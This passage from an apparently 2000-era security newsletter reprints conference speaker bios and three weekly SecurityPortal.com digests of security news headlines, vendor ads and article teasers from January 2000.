rain.forest.puppy - www.wiretrip.net
Famous security paper author - one of those "he could take over the internet if he
felt like it" kind of guys will amaze and amuse with some 0 day exploit training.
Theo DeRaadt - OpenBSD
The leader of the OpenBSD Secure operating system project will talk about securing
operating systems.
Fyodor - www.insecure.org
Author of the award winning Nmap Security Scanner. He also
maintains the popular Insecure.Org web site, the "Exploit World"
vulnerability database, and several seminal papers describing
techniques for stealth port scanning and OS detection via TCP/IP stack
fingerprinting. Fyodor will demonstrate the use of Nmap to identify
subtle security vulnerabilities in a network.
Max Vision - www.maxvision.net - - www.whitehats.com
Security consultant and author of the popular ArachNIDS (www.whitehats.com)
public intrusion signature database will discuss intrusion forensics, attack fakes,
attacker verification, and retaliation.
Dragos Ruiu - dursec.com
Tutorial author, founder of NETSentry Technology, former MPEG and ATM expert for
HP and dursec.com founder; Dragos will be giving the first day's training. Dragos has
instructed tens of thousands of people about digital video and high speed computer
networks in highly rated HP training courses delivered in over 60 cities world-wide. A
long-time security expert and instructor, his course material will explain this intricate
subject through approachable explanations with applications and real-world examples
that will help you apply this important knowledge to your computers immediately.
@HWA
16.0 Security Portal review Jan 16th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
******* Vendor Corner *******
Entrust - We Bring Trust to e-Business
Entrust Technologies lets you tap into new global e-business markets by
securing applications for Web, e-mail, ERP, VPN, desktop files and folders,
as well as a comprehensive suite of solutions to deliver trusted e-business
transactions to the exploding wireless Internet appliance market. For more
information on this complete range of security solutions for e-business
visit http://www.entrust.com <http://www.entrust.com> .
Come see us at RSA 2000, San Jose, CA, Jan.16-20, 2000, San Jose McEnery
Convention Center, Booth #416.
******* What's new with SecurityPortal.com *******
Linux vs Microsoft: Who solves security problems faster?
Does Open Source plug security holes quickly? We took a look at the
security advisories issued by Microsoft and Red Hat in 1999 to gauge the
time lag between the point of a "general community awareness" of a security
problem and the point at which a patch was released. Find out who won here.
<http://securityportal.com/direct.cgi?/cover/coverstory20000117.html>
SecurityPortal.com is proud to sponsor Techno-Security 2000
April 16-19, 2000
Wyndham Myrtle Beach Resort
Myrtle Beach, South Carolina
This one-of-a-kind conference is intended for private industry, government,
law enforcement decision makers and technical experts interested in, or
involved with information security, operations security, high tech crime and
its prevention.
Featured speakers include: Bill Murray, Dr. Dorothy Denning, Bill Crowell,
Chris Goggans, Kevin Manson, Rick Forno, Dr. Myron Cramer, Don Delaney, Dr.
Terry Gudaitis, Matt Devost and many more...
This year's high intensity tracks will include: Hacker Profiling, Intrusion
Detection, Beginner & Advance Computer Forensics, e-Commerce Security, Body
Armor for Cyber-Cops, Information Terrorism, Live Vulnerability Testing,
Incident Response, Tools for Protecting the Enterprise, PKI, plus many more.
Registration is available on-line at: www.TheTrainingCo.com
<http://www.TheTrainingCo.com> or call 410.703.0332 for more information.
******* Vendor Corner *******
Sponsored by Trend Micro, Inc.
http://www.antivirus.com <http://www.antivirus.com> .
ScanMail for Lotus Notes is a native Domino server application.
- First product to provide complete, scaleable virus protection for Lotus
Notes.
- Detects and removes viruses hidden in databases and email attachments.
- Provides real-time scanning of incoming and outgoing emails through the
Domino server.
- Infection notification and provides a Virus Activity Report to assist in
tracing and securing virus point entry.
- Multi-threaded architecture delivers high performance.
- SmartScan eliminates redundant scanning to maximize server efficiency.
******* Top News *******
January 17, 2000
Welcome to SecurityPortal.com - The focal point for security on the Net.
Biggest news of last week was probably the new encryption export regulations
released by the U.S. We will let you know when our lawyers get through
them. Recent postings in our top news
<http://www.securityportal.com/framesettopnews.html> :
Jan 17, 2000
MSNBC: Microsoft certificate bug crashes Netscape browser
<http://msnbc.com/news/357775.asp> - IIS 4 does not correctly support
56-bit certificates, so when Communicator tries to step up to the highest
level of security (128-bit key length certificates), it simply crashes with
an invalid page fault in NETSCAPE.EXE
ZDNet: Computer glitch gives Canadian Microsoft Web site
<http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422989,00.html?chkpt=p
1bn> - a glitch at Network Solutions briefly gave a Canadian ownership of
Microsoft.com and Yahoo.com over the weekend
Jan 15, 2000
ABCNews: Online Credit Hacker May Be Out for Profit
<http://www.apbnews.com/newscenter/internetcrime/2000/01/14/hack0114_01.html
> - While a computer hacker maintains that he stole credit card numbers
from an online retailer as revenge for poor service and a couple of broken
CDs, a security expert believes that Maxus is actually a two-man team in
Russia engaged in a well-organized credit card fraud
FCW: FBI beefs up cyberagent squads nationwide
<http://www.fcw.com/fcw/articles/web-fbi-01-14-00.asp> - The FBI plans to
reinforce its mission to counter cyberattacks with the formation of new
investigative teams specializing in computer intrusions and attacks at all
56 of its field offices around the country. The agency also plans to assign
at least one computer forensics examiner to each field office
ZDNet: Network Associates divides itself
<http://www.zdnet.com/zdnn/stories/news/0,4586,2422403,00.html?chkpt=zdnntop
> - Convinced that six smaller companies can compete better than one big
one, Network Associates gives up on its integrated security strategy
ZDNet: How to steal 2,500 credit cards
<http://www.zdnet.com/zdnn/stories/news/0,4586,2422687,00.html?chkpt=zdnntop
> - Just how easy is it to steal credit card numbers on the Internet? On
Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by
seven small e-commerce Web sites within a few minutes, using elementary
instructions provided by a source. In all cases, a list of customers and all
their personal information was connected to the Internet and either was not
password-protected or the password was viewable directly from the Web site
Jan 14, 2000
IDG: U.S., EU to meet on data privacy
<http://www.idg.net/idgns/2000/01/14/USEUToMeetOnData.shtml> - The U.S.
government has invited representatives from European Union countries to
Washington D.C. next week to work out an agreement on data privacy before
their self-imposed March deadline
CNet: Security software firm Tripwire plans Linux push
<http://news.cnet.com/news/0-1003-200-1522536.html?dtn.head> - Security
software maker Tripwire is planning to unveil a major expansion into new
types of computing products, especially those running on the Linux operating
system
ZDNet: Crypto compromise a lawyers' delight
<http://www.zdnet.com/zdnn/stories/news/0,4586,2422348,00.html?chkpt=zdhpnew
s01> - It's supposed to make ease encryption export controls. But have the
Clinton Administration's new regs instead created a legal maze?
CA: COMPUTER ASSOCIATES WARNS OF A NEW VARIANT OF THE NEWAPT WORM CALLED
NEWAPTd <http://www.ca.com/press/2000/01/newapt_d.htm> - Computer
Associates International, Inc. yesterday warned computer users of a worm
called "NewApt.D," a new variant belonging to the NewApt family of Win32
worms. The worm uses e-mail and executable attachments to propagate from one
computer to another. This worm has been reported in the wild. The original
NewApt worm was first detected in December 1999
Jan 13, 2000
CA: Virus Alert: COMPUTER ASSOCIATES DISCOVERS A NEW WORM CALLED Plage2000
<http://www.ca.com/press/2000/01/plage2000.htm> - Computer Associates
International, Inc. today warned computer users of a new worm called
Plage2000 which could threaten computer email systems as well as eBusiness
infrastructures. This worm has been reported to be in the wild by CA
customers. CA's antivirus research team is analyzing this worm and will
provide more details as they are determined
InternetNews: Circle Tightens Around Online Credit Card Thief
<http://www.internetnews.com/ec-news/article/0,1087,4_281801,00.html> - Law
enforcement officials may be closing in on Maxus, the Russian cracker who
stole 300,000 credit card numbers from e-tailer CD Universe last month and
dispensed them for free to visitors of his Web site
Microsoft Bulletin: Patch Available for Spoofed LPC Port Request
Vulnerability <http://securityportal.com/topnews/ms00-003.html> - The LPC
vulnerability could allow a user logged onto a Windows NT 4.0 machine from
the keyboard to become an administrator on the machine
Yahoo: NSA Selects Secure Computing to Provide Type Enforcement on Linux
<http://biz.yahoo.com/prnews/000113/ca_secure__1.html> - Secure Computing
Corporation today announced that it has been awarded a sole source contract
by the National Security Agency (NSA) to develop a Secure Linux Operating
System (OS). This contract calls for Secure Computing to apply its patented
Type Enforcement(TM) technology, to develop a robust and secure Linux
platform. This award furthers the goal of Secure to pursue and acquire
contracts that will provide enabling technologies to both the Federal
government infrastructure as well as commercial electronic business
applications
ComputerWorld: Teens steal thousands of Net accounts
<http://www.computerworld.com/home/print.nsf/idgnet/000113DD2E> - 2000 A
group of teen-age computer crackers allegedly used thousands of stolen
Internet accounts to probe the networks of two national nuclear weapons
laboratories, according to law enforcement authorities in California
Commerce Announces Streamlined Encryption Export Regulations
<http://204.193.246.62/public.nsf/docs/60D6B47456BB389F852568640078B6C0> -
The U.S. Department of Commerce Bureau of Export Administration (BXA) today
issued new encryption export regulations which implement the new approach
announced by the Clinton Administration in September
InfoWorld: Oracle turns focus to security with Release 2 of 8i database
<http://infoworld.com/articles/ec/xml/00/01/12/000112ecoracle.xml> - With
an eye on the complex security needs of large electronic-commerce sites,
Oracle next week will introduce Release 2 of its flagship database, Oracle
8i, at the RSA Conference 2000 in San Jose, Calif
FCW: Army establishes Infowar DMZ
<http://www.fcw.com/fcw/articles/web-dmz-01-12-00.asp> - The Army plans to
establish network security demilitarized zones (DMZs) at all its bases
worldwide as part of a plan to beef up its cyberdefenses against network
intrusions and attacks
Jan 12, 2000
FSecure: First Windows 2000 Virus Found
<http://www.fsecure.com/news/2000/20000112.html> - F-Secure Corporation, a
leading provider of centrally-managed, widely distributed security
solutions, today announced the discovery of the first Windows 2000 virus.
Windows 2000 is the upcoming new operating system from Microsoft, due to be
released later this year. The new virus is called Win2K.Inta or
Win2000.Install. It appears to be written by the 29A virus group. It
operates only under Windows 2000 and is not designed to operate at all under
older versions of Windows
Kurt's Closet: Some thoughts on (network) intrusion detection systems
<http://securityportal.com/direct.cgi?/closet/closet20000112.html> - Kurt
makes the case for the necessity of emulated intelligence within intrusion
detection systems and reviews some current research projects in this field
RSA and Lotus Team to Provide Integrated Security for Lotus Notes and Domino
R5 <http://www.rsasecurity.com/news/pr/000111-3.html> - Lotus to integrate
RSA's KEON public key infrastructure software into Notes and Domino R5
ZDNet: Data thief threatens to strike again
<http://www.zdnet.com/zdnn/stories/news/0,4586,2420863,00.html?chkpt=zdhpnew
s01> - An e-mail author claiming to be the thief who released as many as
25,000 stolen credit card numbers earlier this month told NBC News he'll
soon start distributing more card numbers on a new Web site
Wired: Domains Hijacked from NSI
<http://www.wired.com/news/politics/0,1283,33571,00.html> - Network
Solutions' administrative policies are once again being blamed for Internet
domain hijackings that took at least brief control over some major Web
domains
Jan 11, 2000
InternetNews: Cybercash Disputes Hacker's Claim
<http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html> -
Cybercash Inc. is disputing an 18-year-old Russian cracker's claims that the
company's credit card verification system was penetrated, resulting in the
theft of thousands of credit card numbers from an online music store
FoxNews: Designed for Destruction
<http://www.foxnews.com/vtech/011000/virus.sml> - Deliberately destructive
viruses are on an upward trend, according to Symantec's Antivirus Research
Center (SARC). Approximately 10 percent of 1993 viruses were deliberately
destructive, but in 1997 that number rose to 35 percent. Often masquerading
as innocuous e-mail, games or even fixes to real problems like the Y2K bug,
today's viruses are more insidious than their counterparts were only a few
years ago
Wired: Crack Exposes Holes in the Web
<http://www.wired.com/news/technology/0,1282,33563,00.html> - There are Web
site cracks, there are break-ins, and there are thefts. But now and then one
rises above the fray to teach a sudden lesson about all things Internet
NWFusion: Win 2000 VPN technology causes stir
<http://www.nwfusion.com/news/2000/0110vpn.html> - When it ships next
month, Microsoft's Windows 2000 will come with technology for setting up an
IP Security-based virtual private network. The question is: Will established
VPN products from other vendors work with Microsoft's technology?
New Internet Explorer vulnerability discovered by Guninski
<http://securityportal.com/list-archive/bugtraq/2000/Jan/0091.html> -
Georgi Guninski posted a new advisory concerning a new IE 5 security
vulnerablity - circumventing Cross-frame security policy and accessing the
DOM of "old" documents. This vulnerability can potentially allow access to
local data. No response from Microsoft yet
Securing E-Business in the New Millennium
<http://securityportal.com/direct.cgi?/topnews/ebusiness20000111.html> -
this article states the real threat will continue to be from within, and
provides advice on the primarily low tech preventative measures any
organization should take
Jan 10, 2000
Sophos: Virus found on magazine CD ROM
<http://www.sophos.com/devreview.html> - The WM97/Ethan virus was
accidentally distributed on the December 1999 cover CD ROM of Developers
Review magazine. The CD ROM, entitled Bonus CD - Issue 13 - December 1999,
contains one file infected by the WM97/Ethan virus: POPKIN\WHATSNEW.DOC
Cisco: Field Notice: Cisco Secure PIX Firewall Software Version 4.43
Deferral <http://www.cisco.com/warp/public/770/fn10231.html> - Any PIX
Firewall on which version 4.43 software is present will continuously reboot.
No other released versions of PIX Firewall are affected
******* What's new with SecurityPortal.com *******
Email Bombing
Denial of Service (DoS) attacks, strange variants in the computer crime
arena, often occur without clear economic motive. Usually, they arise from
anarchistic impulses within the computer underground. And, email bombing is
one of the easiest DoS attacks for the Huns of the Internet to perfect.
Read the story here
<http://securityportal.com/direct.cgi?/topnews/ebomb20000114.html> .
Tell us how we are doing. Send any other questions or comments to
webmaster@securityportal.com <mailto:webmaster@securityportal.com> .
Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com <mailto:jreavis@SecurityPortal.com>
@HWA
17.0 Security Portal review Jan 24th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
******* Vendor Corner *******
Write Your Information Security Policies In A Day!
INFORMATION SECURITY POLICIES MADE EASY is a kit, text and CD, of 1000+
already-written security policies by internationally-known consultant
Charles Cresson Wood. ISPME has JUST BEEN UPDATED and is now available in
Version 7! ISPME v7 is the most comprehensive collection of policies
available covering the latest technology developments and infosec topics.
Each of these policies is accompanied by commentary detailing policy
intention, audience, and the circumstances where it applies. Save weeks of
time and thousands of dollars developing policies for information security
manuals, systems standards, etc. with no consultant fees.
Visit us at http://www.baselinesoft.com <http://www.baselinesoft.com/> for
more information.
******* What's new with SecurityPortal.com *******
The Clock Strikes Midnight for RSA
In a date more feared by RSA Security than Y2K, the patent for the venerable
RSA data encryption algorithm will expire on September 20th of this year. No
longer will RSA be able to charge royalties for the algorithm, first
published by Ron Rivest, Adi Shamir and Leonard Adelman in 1977 and patented
in 1983. After patent expiration, the algorithm will become part of the
public domain, and companies will be free to incorporate the algorithm into
their products without paying RSA any type of royalty or licensing fee.
Although the demise of a 17 year patent for widely used technology is a big
deal, there is also a distinct possibility that, like Y2K, it will turn out
to be a non-event due to the momentum of the established security industry.
Read the full story here.
<http://securityportal.com/direct.cgi?/cover/coverstory20000124.html>
******* Vendor Corner *******
NOW from Entrust Technologies:
All the power of proven Entrust solutions in a managed service.
With Entrust@YourService, you're choosing:
* the leader in bringing trust to e-business
* a solution that will evolve with your e-business needs
* a single, reliable trust backbone for all that you do
Entrust@YourService is the choice for companies like yours that need to
secure e-business quickly and reliably - without losing focus on what you do
best. Click for more info: http://www.entrust.com/choice2
<http://www.entrust.com/choice2>
******* Top News *******
January 24, 2000
Welcome to SecurityPortal.com - The focal point for security on the Net.
Recent postings in our top news
<http://www.securityportal.com/framesettopnews.html> :
Jan 24, 2000
IDG: NEC to unveil world's strongest encryption system
<http://www.idg.net/idgns/2000/01/21/NECToUnveilWorldsStrongestEncryption.sh
tml> - NEC says it will unveil a new encryption technology on Monday that
it claims to be the world's strongest
ZDNet: Mitnick: I was manipulated
<http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop
> - Just freed from prison Friday, notorious hacker Kevin Mitnick slammed
prosecutors and a New York Times' reporter for allegedly treating him
unjustly in the court and in the media over the past six years
Jan 21, 2000
Microsoft: Patch Available for "RDISK Registry Enumeration File"
Vulnerability <http://www.microsoft.com/Security/Bulletins/ms00-004.asp> -
Microsoft has released a patch that eliminates a security vulnerability in
an administrative utility that ships with Microsoft® Windows NT® 4.0,
Terminal Server Edition. The utility creates a temporary file during
execution that can contain security-sensitive information, but does not
appropriately restrict access to it. As a result, a malicious user on the
terminal server could read the file as it was being created.
CNN: Microsoft vows security commitment on Windows 2000
<http://www.cnn.com/2000/TECH/computing/01/20/security.win2k.idg/index.html>
- Microsoft is pledging a firm commitment to security with measures such as
equipping its upcoming Windows 2000 operating system with 128-bit encryption
and interacting with users and rival vendors to detect software breaches and
bugs, a high-ranking company official said in a keynote speech at the RSA
Conference 2000 show here Tuesday.
iDEFENSE and Internet Security Systems Form Strategic Alliance
<http://www.iss.net/cgi-bin/dbt-display.exe/db_data/press_rel/release/012100
142.plt> - Infrastructure Defense, Inc. (iDEFENSE), a leading intelligence
and risk management consulting company, and Internet Security Systems (ISS)
(Nasdaq: ISSX), a leading provider of security management solutions for
e-business, announced today a strategic agreement to integrate iDEFENSE and
ISS capabilities, providing customers with an expanded line of information
security offerings. As a result of the agreement, iDEFENSE and ISS will
share expertise, data and resources as well as resell each company's
products and services to respective customers
ZDNet: Hacker Mitnick to be released Friday
<http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html?chkpt=zdhpnew
s01> - Come Friday, for the first time since 1995, Kevin Mitnick will be
free. Will he hack again?
OpenBSD Security Advisory: procfs <http://www.openbsd.org/errata.html> -
Systems running with procfs enabled and mounted are vulnerable to having the
stderr output of setuid processes directed onto a pre-seeked descriptor onto
the stack in their own procfs memory
FreeBSD Security Advisory: make
<http://www.fear.pl/advisory/fid1/main_eng.htm> - make uses the temporary
file in an insecure way, repeatedly deleting and reusing the same file name
for the entire life of the program. This makes it vulnerable to a race
condition wherein a malicious user could observe the name of the temporary
file being used, and replace the contents of a later instance of the file
with her desired commands after the legitimate commands have been written
Jan 20, 2000
Currents: Virus Attacks Cost 12Bil
<http://www.currents.net/newstoday/00/01/20/news14.html> - Virus attacks
cost organizations a total of $12.1 billion during 1999, according to a
report released today. Released by Computer Economics, the report said that
over the last three years there has been a major programming shift as
viruses have become far more malicious and specifically designed for
destruction and damage
UnionTribune: Global Health hit by hacker
<http://www.uniontrib.com/news/computing/20000120-0010_1b20health.html> - A
Poway company selling health products over the Internet was the apparent
victim of a "hacker," who took information containing customer names and
credit-card numbers and posted them on a Web site. The incident occurred
Monday when someone accessed a little-used Web site kept by Global Health
Trax, posted information that had been deleted months ago, then tipped off a
reporter for MSNBC about it
Wired: Say Hello to the NSA
<http://www.wired.com/news/politics/0,1283,33776,00.html> - It wasn't hard
to do if you were at the RSA Security conference this week in San Jose. The
National Security Agency was there, like any other exhibitor, to be seen and
promote technology partnerships
Microsoft Bulletin: Malformed Conversion Data Vulnerability
<http://securityportal.com/topnews/ms00-002.html> - Microsoft has released
a patch that eliminates a security vulnerability in a utility that converts
Japanese, Korean and Chinese Microsoft Word 5 documents to more-recent
formats. A patch is available for the buffer overflow problem
Computer Currents: Symantec Gets Anti Virus Patent
<http://www.computercurrents.com/newstoday/00/01/20/news3.html> - Symantec
has announced that a key technology in its Striker anti-virus engine has
been granted patent rights by the US Patent and Trademark office. The firm
said that the next-generation technology enables the Striker engine to
detect complex polymorphic, or self-mutating, viruses much more rapidly than
traditional anti-virus engines
Wired: Clinton Favors Computer Snooping
<http://wired.com/news/business/0,1367,33779,00.html> - The Clinton
administration wants to be able to send federal agents armed with search
warrants into homes to copy encryption keys and implant secret back doors
onto computers
Computer Currents: Encryption Challenge Beaten
<http://www.computercurrents.com/newstoday/00/01/19/news6.html> - A 56-bit
security challenge laid down by CS Communication & Systemes in March, 1999,
has been cracked in just two months by a team of students working with no
less than 38,000 Internet users around the world
TechWeb: Washington Rep: Encryption Rules Need Work
<http://www.techweb.com/wire/story/TWB20000119S0013> - interview with Rep
Bob Goodlatte. "We think it is almost, but not quite, a 180-degree turn from
[previous policy]," Goodlatte said. "But the problem is the implementation
of it. They've made the application process [for encryption export] complex
and cumbersome."
The Fastest Growing Crime in America: Identity Theft
<http://securityportal.com/direct.cgi?/topnews/identity20000120.html> - One
of the nation's fastest-growing crimes is identity theft. Using a variety of
methods, criminals obtain key pieces of a person's identity and fraudulently
use that information for various illegal reasons. Some law enforcement
officials estimate about 3,000 cases of identity theft a day within the
United States
Jan 19, 2000
InformationWeek: Security Vendors Intro Wireless Tools
<http://www.informationweek.com/story/IWK20000119S0002> - With the ongoing
convergence of Internet and wireless devices such as cell phones and
personal digital assistants, there's heightened awareness of security issues
among vendors and customers. At the RSA 2000 Security Convention in San
Jose, Calif., this week, vendors addressed the issue with a variety of new
products and alliances
InformationWeek: Cisco To Acquire Two VPN Vendors
<http://www.informationweek.com/story/IWK20000119S0003> - Looking to give
users options for building virtual private networks, Cisco Systems today
disclosed plans to supplement its product portfolio by buying VPN vendors
Altiga Networks and Compatible Systems for a combined 567 million in stock
Canoe: Dodging a hack attack
<http://www.canoe.ca/TechNews0001/19_connect.html> - Just how safe is your
data on the Net? The stories are scary: Just before Christmas, a 14-year-old
kid was arrested in Toronto after hacking a company's site and changing the
passwords. He was arrested when he showed up to collect his $5,000 ransom. A
couple of weeks later, a Russian hacker, 'Maxim,' held 300,000 credit card
numbers hostage, demanding CDUniverse pay him US$100,000. To make good on
his threat, he started posting the information publicly. So far, CDUniverse
hasn't paid. And Monday, computer hackers vandalized the 'Thomas' Web site
of the U.S. Library of Congress
NAI: W32/Ska2K.worm virus, Risk Low <http://vil.nai.com/vil/wm10543.asp> -
This edition of the worm is only a minor variation of the original first
identified in February 1999. This worm is detected with current DAT files.
The file may be received by email with a size of 10,000 bytes. The worm if
run will patch WSOCK32.DLL to promote distribution by email on the host
system if the email application supports SMTP email communication. If the
host supports this environment, emails when sent from the host will be
followed by a second message with the worm either attached or included as
MIME
TechWeb: Zero Knowledge Hires Open Source Guru
<http://www.techweb.com/wire/story/TWB20000118S0027> - Mike Shaver, who
headed developer relations for the Mozilla.org project, is joining
Zero-Knowledge Systems, a Montreal company rolling out an identity-cloaking
Internet service
Kurt's Closet: SuSE Linux - a vendor gets security conscious
<http://securityportal.com/direct.cgi?/closet/closet20000119.html> - a look
at the built in security features of SuSE Linux, including an interview with
SuSE security maven Marc Heuse
MSNBC: "Smurf Attack" snarls web service in Seattle over the weekend
<http://www.msnbc.com/local/king/483728.asp> - A "smurf" attack or series
of attacks on an Internet service provider snarled Wide World Web traffic in
as much as 70 percent of the region last weekend, operators of the service
say. See http://securityportal.com/cover/coverstory19990531.html
<http://securityportal.com/cover/coverstory19990531.html> to learn about
Smurf Amplifier Attacks
Jan 18, 2000
Response: Some thoughts on (network) intrusion detection systems
<http://securityportal.com/direct.cgi?/closet/closet20000112-response.html>
- Kurt Seifried responds to the article featured prominently at Linux Today
questioning his analysis of the shortcomings of network-based intrusion
detections. (How much confidence do you have in your ID tools?)
Sophos: Guidelines for Safe Hex
<http://www.sophos.com/virusinfo/articles/safehex.html> - As well as keeping
your anti-virus software up to date there are other ways in which you can
reduce the chances of virus infection inside your company. We list some of
the guidelines you might like to consider for safer computing in your
organisation
TechnologyPost: Hackers target Visa, other big firms
<http://www.technologypost.com/enterprise/DAILY/20000118105052617.asp?Sectio
n=Main> - Visa International has confirmed British press reports at the
weekend that its global network was sniffed by hackers or similar people
unknown last summer, but that its security systems locked down the on-line
sessions before any systems break-ins occurred
Wired: Online Security Remains Elusive
<http://www.wired.com/news/politics/0,1283,33569,00.html> - As e-business
lights up the Web, the critical matter of data security is headed for center
stage. There have been too many security failures in the past and it's going
to get worse, said Paul Kocher, president and chief scientist for
Cryptography Research
FoxNews: Artificial Immunology
<http://www.foxnews.com/vtech/011800/virus2.sml> - Protection and recovery
efforts from hack attacks and viruses account for 2.5 percent - or 25
billion - of global spending on information technology each year. The costs
are so high mainly due to labor-intensive data recovery and productivity
loss from downed systems
Sophos: WM97/Marker-BU a Word 97 macro virus
<http://www.sophos.com/downloads/ide/> - WM97/Marker-BU is a variant of
Marker-R with various changes, and has been seen in the wild. If the date is
between 23rd and 31st of July the virus changes the Application.Caption from
Microsoft Word to Happy Birthday Shankar-25th July. The world may Forget but
not me. It then displays a message box asking Did You curse Shankar on his
Birthday? If you answer Yes another message box appears saying Thank You! I
love you. are u free tonight? However, if you click No a message box appears
saying You are Heart Less. The virus then makes changes to the document
summary
TechWeb: Entrust Launches Security Outsourcing
<http://www.techweb.com/wire/story/TWB20000118S0006> - Entrust, a provider
of public key infrastructure and digital certificate security applications,
on Monday unveiled plans to provide outsourced security services for
business-to-business and business-to-consumer transactions, and said it has
partnered with Cash Tax to host the service
InfoWorld: Panelists debate the issues surrounding cryptography
<http://www.infoworld.com/articles/ic/xml/00/01/17/000117iccrypto.xml> -
Issues including ease of use, governmental regulations, and wireless systems
will be at the forefront of the cryptography realm in upcoming years, a
panel of specialists said Monday at the RSA Conference 2000 show. The
panelists, with affiliations ranging from the Massachusetts Institute of
Technology to Sun Microsystems, urged that a variety of actions be taken by
the industry
Wired: 56 a Bit Short of Secure
<http://www.wired.com/news/technology/0,1282,33695,00.html> - The collective
crackers of Distributed.net have knocked off another 56-bit encryption key,
this time in just over two months
InfoWorld: Verisign aims to secure wireless transactions
<http://www.infoworld.com/articles/ic/xml/00/01/17/000117icverisign.xml> -
At the RSA Conference 2000 show here on Monday, VeriSign unveiled a set of
technologies, services, and alliances to promote trusted, wireless Internet
commerce. Citing the growth in usage of wireless devices, VeriSign Vice
President of Worldwide Marketing Richard Yanowitch said that the initiative
is intended to provide a complete trust infrastructure to the wireless world
PCWorld: The Web Is a Hacker's Playground
<http://www.pcworld.com/current_issue/article/0,1212,14415,00.html> - Can
the Net be crime-proofed? Not as long as there are sloppy programmers and
clever cat burglars
Microsoft Bulletin: Malformed RTF Control Word
<http://securityportal.com/topnews/ms00-005.html> - The control information
is specified via directives called control words. The default RTF reader
that ships as part of many Windows platforms has an unchecked buffer in the
portion of the reader that parses control words. If an RTF file contains a
specially-malformed control word, it could cause the application to crash. A
patch is available for this vulnerability, which can causes a Denial of
Service condition in all Microsoft Operating Systems
Jan 17, 2000
FCW: NSA grapples with Linux security
<http://www.fcw.com/fcw/articles/web-nsalinux-01-17-00.asp> - The National
Security Agency, the super-secret arm of the Defense Department responsible
for signals intelligence and information systems security, last week tapped
Secure Computing Corp. to develop a secure version of the Linux operating
system
IDG: Film studios bring claim against DVD hackers
<http://www.idg.net/idgns/2000/01/17/FilmStudiosBringClaimAgainstDVD.shtml>
- Eight major motion picture companies late last week filed injunction
complaints in U.S. Federal Court against three alleged hackers to prevent
them from publishing an unauthorized DVD de-encryption program on their Web
sites
******* What's new with SecurityPortal.com *******
The Unbreakable Cipher: Why Not Just Stay With Perfection?
John Savard gets under the covers of ciphers to explain why the market uses
DES and RSA algorithms instead of the "perfect" cipher. Read the full story
here. <http://securityportal.com/direct.cgi?/topnews/crypto20000119.html>
Tell us how we are doing. Send any other questions or comments to
webmaster@securityportal.com <mailto:webmaster@securityportal.com> .
Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com <mailto:jreavis@SecurityPortal.com>
@HWA
18.0 Security Portal Review Jan 31st
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
******* Vendor Corner *******
Sponsored by VeriSign - The Internet Trust Company
Protect your servers with 128-bit SSL encryption today!
Get VeriSign's FREE guide, "Securing Your Web Site for Business". It tells
you everything you need to know about using SSL to encrypt your e-commerce
transactions for serious online security. Click here!
http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000
<http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000>
******* What's new with SecurityPortal.com *******
Information Warfare
As the latest buzzword to succeed Y2K on the media's "terror throne,"
information warfare (IW), as a useful term, begs for realistic definition.
No doubt, bin Laden can attack us. Graduate students at Cal Tech, MIT, or
UCLA and tenth-graders at your local high school can also launch "volleys"
against corporate America. How effective such invasions would be is the
critical issue. In the Gulf War, Iraqi anti-aircraft batteries expended vast
rounds against allied planes, and it was almost totally ineffective. Sheer
bulk doesn't always equate to victory. Read the full story here.
<http://securityportal.com/direct.cgi?/cover/coverstory20000131.html>
A Practical Guide to Cryptography
What is it, where do I get it and how do I use it? Kurt Seifried has
developed a How-to for using cryptography with several operating systems.
Find the guide here.
<http://securityportal.com/research/cryptodocs/basic-book/index.html>
******* Vendor Corner *******
NOW from Entrust Technologies:
All the power of proven Entrust solutions in a managed service. With
Entrust@YourService, you're choosing:
* the leader in bringing trust to e-business
* a solution that will evolve with your e-business needs
* a single, reliable trust backbone for all that you do
Entrust@YourService is the choice for companies like yours that need to
secure e-business quickly and reliably - without losing focus on what you do
best. Click for more info: http://www.entrust.com/choice2
<http://www.entrust.com/choice2>
******* Top News *******
January 31, 2000
Welcome to SecurityPortal.com - The focal point for security on the Net.
Recent postings in our top news
<http://www.securityportal.com/framesettopnews.html> :
Jan 31, 2000
ZDNet: What´s wrong with Microsoft security?
<http://www.zdnet.com/zdnn/stories/comment/1,5859,2429536,00.html> - The
term "Microsoft's latest security glitch" has become a cliche. But it didn't
have to
Jan 28, 2000
Wired: Fast, Simple ... and Vulnerable
<http://www.wired.com/news/technology/0,1282,33972,00.html> - A online
bank's opening has been marred by a glitch that let customers transfer money
from any U.S. bank account. Anyone who knew what they were doing could move
funds to an X.com bank account and then withdraw them
ZDNet: Win2000 security hole a 'major threat'
<http://www.zdnet.com/zdnn/stories/news/0,4586,2429334,00.html?chkpt=zdnntop
> - Six banks and three major PC makers affected by bug that lets attackers
view files stored on Microsoft Index Server. Microsoft issues patch.
CNN: DoubleClick suit filed
<http://cnnfn.com/2000/01/28/emerging_markets/wires/doubleclick_wg/> -
Woman ac
cuses Net advertising firm of privacy violations
TechWeb: Axent To Develop Linux Firewall With Cobalt
<http://www.techweb.com/wire/story/TWB20000127S0014> - E-security vendor
Axent Technologies Thursday unveiled a partnership with Cobalt Networks
under which the companies will produce a Linux firewall and virtual private
network appliance for small to midsize companies, branch offices, and
service providers
ComputerWorld: Congress backs federal efforts on Y2K, is wary on security
<http://www.computerworld.com/home/print.nsf/all/000127E416> - Fernando
Burbano, the CIO at the U.S. Department of State, said federal agencies
don't have the money to pursue critical infrastructure protection
initiatives
LinuxJournal: Crackers and Crackdowns
<http://www2.linuxjournal.com/articles/culture/007.html> - DeCSS author Jon
Lech Johansen's home was raided by special police forces at the whim of the
Motion Picture Association, an organization which affectionately refers to
itself as "a little State Department".
Mercury Center: Student charged with hacking
<http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm> -
A federal grand jury in San Jose on Wednesday indicted a former Princeton
University student suspected of hacking into the computer system of a Palo
